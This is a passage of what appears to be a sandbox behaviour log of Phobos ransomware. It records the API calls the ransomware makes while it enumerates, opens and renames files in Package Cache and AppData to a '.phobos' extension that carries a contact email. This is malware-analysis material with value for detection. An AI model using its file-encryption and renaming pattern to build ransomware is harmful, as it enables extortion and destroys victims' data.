Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.330] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=997054) returned 1 [0123.330] CloseHandle (hObject=0x2b8) returned 1 [0123.330] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0123.330] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.330] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.330] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.330] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.331] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=143360) returned 1 [0123.331] CloseHandle (hObject=0x2b8) returned 1 [0123.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0123.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.331] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.331] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.332] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.343] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=654) returned 1 [0123.343] CloseHandle (hObject=0x348) returned 1 [0123.343] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm")) returned 0x20 [0123.344] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.344] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.344] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.344] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.345] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=455720) returned 1 [0123.345] CloseHandle (hObject=0x348) returned 1 [0123.345] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe")) returned 0x20 [0123.345] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.345] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.345] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.345] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.349] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=5800228) returned 1 [0123.349] CloseHandle (hObject=0x348) returned 1 [0123.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0123.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0123.350] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0 [0123.350] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.350] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.369] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=151552) returned 1 [0123.369] CloseHandle (hObject=0x348) returned 1 [0123.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0123.369] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.369] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.370] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.370] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.370] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=666) returned 1 [0123.370] CloseHandle (hObject=0x348) returned 1 [0123.370] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm")) returned 0x20 [0123.370] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.370] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.402] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.402] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0123.417] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=143360) returned 1 [0123.417] CloseHandle (hObject=0x330) returned 1 [0123.417] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0123.417] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.417] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.417] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.417] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.469] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=455576) returned 1 [0123.469] CloseHandle (hObject=0x348) returned 1 [0123.469] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe")) returned 0x20 [0123.469] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.469] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.469] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.470] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.470] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=809765) returned 1 [0123.470] CloseHandle (hObject=0x348) returned 1 [0123.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0123.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.471] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.471] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.471] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.521] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=151552) returned 1 [0123.522] CloseHandle (hObject=0x348) returned 1 [0123.522] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0123.522] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.522] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.522] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.522] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.614] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=143360) returned 1 [0123.614] CloseHandle (hObject=0x348) returned 1 [0123.614] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0123.614] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.614] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.614] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3dcfa00 | out: pbBuffer=0x3dcfa00) returned 1 [0123.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.615] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3dcf9a0 | out: lpFileSize=0x3dcf9a0*=53188) returned 1 [0123.615] CloseHandle (hObject=0x348) returned 1 [0123.615] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 